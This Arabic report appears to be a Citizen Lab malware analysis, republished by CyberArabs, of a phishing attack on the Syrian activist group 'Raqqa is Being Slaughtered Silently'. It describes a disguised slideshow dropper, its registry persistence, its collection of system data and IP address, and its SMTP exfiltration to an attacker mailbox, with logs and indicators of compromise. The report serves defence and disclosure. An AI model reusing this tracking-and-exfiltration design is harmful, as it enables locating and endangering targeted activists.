هجوم خبيث يستهدف سوريين ينتقدون “داعش”‎


10410638_726925400737050_924439927286099703_n

ملخص:

يتناول هذا التقرير هجوماً خبيثاً يرتبط بدولة الإسلام في العراق والشام. وحرصاً على التركيز على تطور هذا التهديد، نقوم في هذا التقرير بتحليل الهجوم وتزويدكم بقائمة حول مؤشرات الإصابة به.

تعرّضت مجموعة إعلامية سورية تنتقد دولة الإسلام في العراق والشام لهجوم رقمي يستهدف كشف مواقع أفرادها. مجموعة “الرقة تذبح بصمت” تركز نشاطها على توثيق انتهاكات حقوق الانسان من قبل عناصر “داعش” الذي يحتلّون مدينة الرقة. وكردّ منهم قام العناصر عدة مرات باستهداف المجموعة عبر مداهمات للمنازل، وتنفيذ عمليات خطف واغتيالات.

تواجه المجموعة أيضاً تهديدات على الإنترنت من قبل عناصر “داعش” ومناصريها، تتضمن تهكّمات من أن “داعش” تتجسس على المجموعة.

على الرغم من أننا لا نستطيع أن ننسب بشكل قاطع الهجوم لـ”داعش” أو مناصريها، إلا أنه من المعقول أنها على علاقة بالموضوع.

كون البرمجية الخبيثة المستخدمة في الهجوم تختلف عن تلك الحملات التي يشنها النظام السوري، ويستهدف الهجوم مجموعة ناشطة ضد قوات “داعش”.

تحليل الهجوم

يصف هذا القسم هجوماً تم شنّه بتركيز على عناوين بريد إلكترونية تعود إلى القائمين على حملة “الرقة تذبح بصمت”، “سيتزن لاب” قام بتحليل هذا الهجوم بموافقة القائمين على المجموعة، الذين طلبوا بدورهم أن يتم ذكر أسماءهم في هذا التقرير.

الهجوم أخد شكل البريد غير المرغوب فيه، ويحتوي على رابط تحميل للملف الخبيث، الذي يخفي برمجية خبيثة مخصصة تقوم بإرسال معلومات عن جهاز الضحية وعنوان الـ”آيبي” الخاص به إلى عنوان بريد إلكتروني يقوم بإدارته الشخص الذي قام بتنفيذ الهجوم.

البرمجيات الخبيثة المستخدمة في هذا الهجوم تصيب المستخدم الذي يقوم بفتح الملف الخبيث “slideshow”، وتقوم بإرسال معلومات حول نظام التشغيل على جهازه وعنوان الـ”آيبي” إضافة إلى كشف موقعه الجغرافي، وتقوم بتحديث هذه المعلومات في كل مرة يتم فيها إعادة تشغيل الجهاز المصاب.

على عكس البرمجيات الخبيثة المرتبطة بالنظام السوري، لا تحتوي البرمجية الخبيثة التالية على أي وظائف خاصة بالتحكم عن بعد، مما يرجح أنها تستهدف تحديد مواقع الأشخاص المستهدفين.

طريقة الإصابة

زيارة الرابط المرسل في البريد الإلكتروني يقوم بتحويل المستخدم إلى موقع مشاركة الملفات “tempsend.com” لتحميل ملف يحمل اسم slideshow.zip

citizenlab-1

والذي يحتوي بدوره على الملف slideshow.exe

citizenlab-2

الملف يقوم بفك الضغط عن نفسه تلقائياً ويحمل أيقونة تهدف إلى الإيحاء للضحية بأن هذا الملف هو ملف “عرض شرائح”.

عند فتح الملف، يتم عرض شرائح تحتوي على صور تم أخدها من “غوغل إيرث”، تعرض مواقع في سوريا وتشير إلى مقر “داعش” الرئيسي، وصور أخرى للمواقع التي قصفت خلال الضربات الجوية الأمريكية.

citizenlab-3

citizenlab-4

الإصابة وجمع البيانات

عند الفتح، يقوم ملف “slideshow.zip” بإنشاء وفتح عدد من الملفات:

C:\Users\[Username]\AppData\Local\Temp\IXP000.TMP\AdobeR1.exe

C:\Users\[Username]\AppData\Local\Temp\IXP000.TMP\pictures.exe

“AdobeR1.exe” هو الملف الخبيث، بينما “pictures.exe” هو الملف السليم الذي يقوم بعرض الشرائح. عند إغلاق عرض الشرائح يتم حذف الملفين.

ملف “AdobeR1” يقوم بكتابة مجموعة من الملفات التنفيذية تقوم بجمع المعلومات ووظائف الاتصال، وتتضمن هذه الملفات:

C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\AdbrRader.exe

C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\AdobeIns.exe

C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\GoogleUpate.exe

C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\GooglUpd.exe

C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\nvidrv.exe

C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\nvisdvr.exe

C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\rundl132.exe

C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\svhosts.exe

C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\nvidrv.exe

التسلسل البرمجي

التسلسل البرمجي في جمع وإرسال المعلومات غير مألوف إلى حد ما، حيث يقوم كل برنامج بوظيفة واحدة ويتم الاتصال عبر العلامات التي يتم خلقها في سجل نظام التشغيل. وتظهر البرامج أنها تستخدم مكتبة تشغيل “Visual C++”.

أولاً، البرنامج nvidrv يقوم بإضافة نفسه إلى قائمة التشغيل التلقائي:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run under name “UpdAdbreader”

كما يقوم بإنشاء سلسلة من مفاتيح التسجيل التي يقوم كل برنامج باستخدامها للاتصال.

مفاتيح التسجيل والبرامج التي تستخدمها:

rundl132.exe:

DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K6F-DKV8J-FKVJI-GVKBU\6nvisdvr.exe:

DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K4F-DKV8J-FKVJI-GVKBU\4GoogleUpate.exe:

DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K3F-DKV8J-FKVJI-GVKBU\3AdbrRader.exe:

DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K2F-DKV8J-FKVJI-GVKBU\2nvidrv.exe:

DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K1F-DKV8J-FKVJI-GVKBU\1

Sets name “1” to StartupInfo structure as a string, e.g. “0x3110x611”

يقوم بعدها nvidrv بتشغيل برنامج “GooglUpd”، الذي يقوم بدوره بتنظيف ملفات البرنامج إن وجدت ثم يقوم بتشغيل برنامج “AdbrRader”.

AdbrRader (الذي يقوم بالاتصال عبر مفتاح التسجيل “٢”) يقوم بكتابة الملف “vgadmysadm.tmp” مع اسم المفتاح الآخر “٢” ومعلومات بدء التشغيل.

C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\ vgadmysadm.tmp

تالياً، يقوم nvidrv بتشغيل GoogleUpdate الذي يقوم بجمع معلومات عن نظام التشغيل ويقوم بكتابة هذه المعلومات في الملف:

C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\vg2sxoysinf.tmp

ثم يقوم nvidrv بتشغيل nvisdvr (المفتاح رقم “٤”) الذي يقوم بجمع قائمة العمليات المفتوحة في الجهاز، وتتم كتابة هذه الملعلومات في الملف:

C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\v2cgplst.tmp

أخيراً، يقوم nvidrv بتشغيل svhosts، الذي يقوم باختبار الاتصال بشبكة الانترنت عبر عملية استعلام نظام اسم النطاقات (DNS query) للعنوان “windowsupdate.microsoft.com” ثم يقوم بتشغيل الملف “rundl132” في حال لم يتم تشغيله مسبقا، وذلك عبر التحقق من وجود المفتاح “٦” في السجل، حيث يقوم بإضافة القيمة 0 إلى المفتاح ثم يقوم بتشغيله.

في الخطوة التالية يقوم الملف “rundl132.exe” بتنفيذ طلب HTTP GET للعنوان “myexternalip.com” ثم يقوم بالتقاط العنوان الخاص بالجهاز المصاب:

GET /raw HTTP/1.1

Host: myexternalip.com

Cache-Control: no-cacheHTTP/1.1 200 OK

Server: nginx/1.6.2

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: close

Date: [REDACTED]

My-External-Ip: [REDACTED]f

[REDACTED]0

ثم يعمد rundl132 إلى إنشاء الملف:

C:\Users\[Username]\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q7B90TFG\raw[1].txt

ثم يقوم بكتابة عنوان الـ”آيبي” في الملف:

C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\vgosysaext.tmp

أخيراً، يقوم rundl132 بتشغيل AdobeIns، الذي يقوم بضغط محتويات مجلد win32.tmp.

“AdobeIns.exe” يقوم بجمع الملفات التي تمت كتابتها من قبل البرامج الأخرى ويقوم بوضعها في ملف zip مضغوط ومحمي بكلمة سر:

C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\drv.sys\mxtd

نقل البيانات

يتم نقل البيانات إلى عنوان بريد إلكتروني يتم التحكم به من قبل المهاجم.

يقوم “AdobeIns” بالاتصال بحساب موجود على مزود البريد الإلكتروني inbox.com عبر اتصال SMTP باستخدام بيانات دخول تم تضمينها في البرنامج. البرمجية الخبيثة تقوم بإرسال البريد الإلكتروني إلى العنوان ذاته يحتوي على النص “Hello” ومرفقاً بالملف “mxtd”.

البيانات التي تم توليدها عبر اتصال “SMTP” من قبل البرمجية الخبيثة وإرسالها إلى موقع inbox.com:

220 [REDACTED]ESMTP Postfix

EHLO [REDACTED]

250-[REDACTED]

250-PIPELINING

250-SIZE 10240000

250-VRFY

250-ETRN

250-ENHANCEDSTATUSCODES

250-8BITMIME

250 DSN

MAIL FROM:< [REDACTED]@inbox.com>

250 2.1.0 Ok

RCPT TO:< [REDACTED]@inbox.com>

250 2.1.5 Ok

DATA

354 End data with .

Date: [REDACTED]

From: <[REDACTED]@inbox.com>

X-Priority: 3 (Normal)

To: <[REDACTED]@inbox.com>

Subject: repo

MIME-Version: 1.0

Content-Type: multipart/mixed; boundary=”__MESSAGE__ID__[REDACTED]”–__MESSAGE__ID__[REDACTED]

Content-type: text/plain; charset=US-ASCII

Content-Transfer-Encoding: 7bitHello

–__MESSAGE__ID__[REDACTED]

Content-Type: application/x-msdownload; name=”mxtd”

Content-Transfer-Encoding: base64

Content-Disposition: attachment; filename=”mxtd”[REDACTED]–__MESSAGE__ID__[REDACTED]–.

250 2.0.0 Ok: queued as [REDACTED]

QUIT

221 2.0.0 Bye

تقييم وظائف البرمجية الخبيثة

البرمجيات الخبيثة في هذه الدراسة غير عادية لأنها تعتمد على ستة ملفات تنفيذية منفصلة، لكل منها مهمة واحدة، وكل واحدة تتواصل عبر علامات أنشئت في السجل.

البرمجيات الخبيثة أيضا مثيرة للاهتمام لأنها لا توفر إمكانية التحكم عن بعد، ولكن فقط ترسل رسالة بالبريد الالكتروني تحتوي على عنوان الـ”آيبي” الخاص بالضحية ومعلومات عن نظام التشغيل.

وتقوم البرمجية الخبيثة بإعادة إرسال المعلومات من جديد في كل مرة يتم إعادة تشغيل الحاسوب فيها، ولكنه لا يقوم بتحديث المعلومات التي يتم إرسالها عند إعادة التشغيل (قد يكون خطأ برمجي).

هذا السلوك يشير بقوة إلى أن وظيفة هذه البرمجيات الخبيثة هي تحديد ومتابعة موقع الضحية. وقد يتم استخدام معلومات النظام لاستهداف جهاز الضحية مستقبلاً، ولكن طالما أن المهاجم قد قام بالفعل بعملية تشغيل ملفات على جهاز الضحية فإنه من المفاجئ عدم استخدام أي وظائف إضافية، أو عدم استخدام أي أداة للتحكم عن بعد، حيث كان من الممكن لهذه الأداة تزويدهم بوصول أوسع ومعلومات أكثر عن الضحية تتعدى عنوان الـ”آيبي”.

عبر عدم احتوائه على أي وظائف تتعلق بالتحكم عن بعد، يبدو البرنامج أقل شبهاً بالبرمجيات الخبيثة، وقد يثير شبهات أقل في أدوات الحماية والتفحص. حيث حقق البرنامج كشفاً بعدد مرات أقل عند إرساله للمرة الأولى لموقع virustotal، على سبيل المثال تم كشفه من قبل 6 من أصل 55 مضاد فيروسات، ما يعني نسبة 10٪ فقط.

نقل بيانات البرمجية الخبيثة عبر البريد الإلكتروني يضيف درجة إضافية من الغموض، ويوفر طبقة إضافية من التجريد بين المهاجم والضحية: حيث لا يوجد أي حاجة لوجود مخدّم سيطرة وتحكم. حيث تنتقل بيانات البرمجية الخبيثة بشكل مستقل، تاركةً المواد في البريد الإلكتروني ليقوم المهاجم بتجميعها في وقت لاحق.

البرمجية الخبيثة لا تحتوي على أية عمليات تمويه وليس متقناً بشكل كبير في تطويرها أو التفاعل مع نظام التشغيل. ولكن مع ذلك، فإننا نعتقد أن مطور هذا البرنامج هو على علم بتقنيات معينة للحد من كشف البرامج الضارة على الشبكة، بما في ذلك نقل البيانات عبر اتصالات مشفرة للبريد الإلكتروني. ومع ذلك، فإن المهاجم لم ينفذ تشفير البريد الإلكتروني بشكل صحيح:

البرمجية الخبيثة لن تحاول استخدام اتصال TLS في حالات معينة، ونتيجة لذلك فإن بيانات الدخول إلى البريد الإلكتروني ستكون مقروءة في بيانات الشبكة.

إضافة إلى ذلك، تستخدم البرمجية الخبيث تقنية “PKWARE” القديمة في تشفير ملفات ZIP، والتي لا يمكن اعتبارها آمنة حيث يتم تخزين كلمة السر في الرمز الثنائي (Binary) الخاص بالملف المضغوط دون أي تشفير أو تمويه.

مؤشرات على الإصابة

الملفات الخبيثة

اسم الملف MD5
slideshow.zip b72e6678e79cc57d33e684528b5721bd
slideshow.exe f8bfb82aa92ea6a8e4e0b378781b3859

ملفات تم إنشاؤها بواسطة الملفات الخبيثة

اسم ومسار الملف MD5
C:\Users\[Username]\AppData\Local\Temp\IXP000.TMP\AdobeR1.exe
(note: folder and file deleted after slideshow closed)
aa6bcba23cd39c2827d72d33f5104856
C:\Users\[Username]\AppData\Local\Temp\IXP000.TMP\pictures.exe
(note: folder and file deleted after slideshow closed)
eda83c8e4ba7d088593f22d56cf39d9f
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\AdbrRader.exe 9d36e8e3e557239d7006d0bb5c2df298
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\AdobeIns.exe 1d5d8c5ce3854de61b28de7ca73093f1
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\GoogleUpate.exe 55039dd6ce3274dbce569473ad37918b
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\GooglUpd.exe efdd9b96ae0f43f7d738ead2e1d5430c
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\nvidrv.exe 0e3eb8de93297f12b56de9fc33657066
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\nvisdvr.exe 3eb6f95c321ace0e3b101fd7e2cdd489
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\rundl132.exe 84bbd592a212f5a84923e82621e9177d
C:\Users\[Username]\Microsoft\Windows\Z0xapp8T.tmp\ svhosts.exe 13caa1c95e6610f2d5134174e1fb4fd0

ملفات المعلومات التي يتم جمعها (غير مشفرة)

اسم ومسار الملف
C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\v2cgplst.tmp
C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\vg2sxoysinf.tmp
C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\vgadmysadm.tmp
C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\vgosysaext.tmp

الملف المسرّب (مشفر)

اسم ومسار الملف
C:\Users\[Username]\AppData\Local\Microsoft\Windows\win32.tmp\drv.sys\mxtd

مفاتيح التسجيل

اسم ومسار الملف
DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K1F-DKV8J-FKVJI-GVKBU\1
DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K2F-DKV8J-FKVJI-GVKBU\2
DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K3F-DKV8J-FKVJI-GVKBU\3
DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K4F-DKV8J-FKVJI-GVKBU\4
DefaultKeyboard\User\F124-5KK83-F2IV9-FDN293\JIPC7-K2ODP-OFnD3-FJCC3\J1K6F-DKV8J-FKVJI-GVKBU\6

شكر وتقدير

نحن ممتنون لفريق “سايبر أرابز” و”معهد صحافة الحرب والسلام” (IWPR) لعملهم ومساعدتهم.

كما نشكر بشكل خاص الذين قاموا بالمساعدة في إعداد هذا التقرير: سوريون مجهولون، ماساشي كريت-نيشيهاتا، سارة مكون، مورغان ماركيزبوير، رون ديبرت، بيل مارزاك، نارت فيلينوف، إيرين بويترانتو، كريستين دينيسين.

الدعم مقدم لهذا البحث عبر منح من قبل منظمة جون دي وكاثرين مكارثر، ومنظمة فورد.

ان كان لديكم اي استفسار او سؤال الرجاء مراسلتنا عبر التعليقات في اسفل الشاشة

للتعليقات

هذا الموقع يستخدم Akismet للحدّ من التعليقات المزعجة والغير مرغوبة. تعرّف على كيفية معالجة بيانات تعليقك.

CyberArabs عضو في:

للتبليغ

سجل في نشرتنا الشهرية

%d مدونون معجبون بهذه: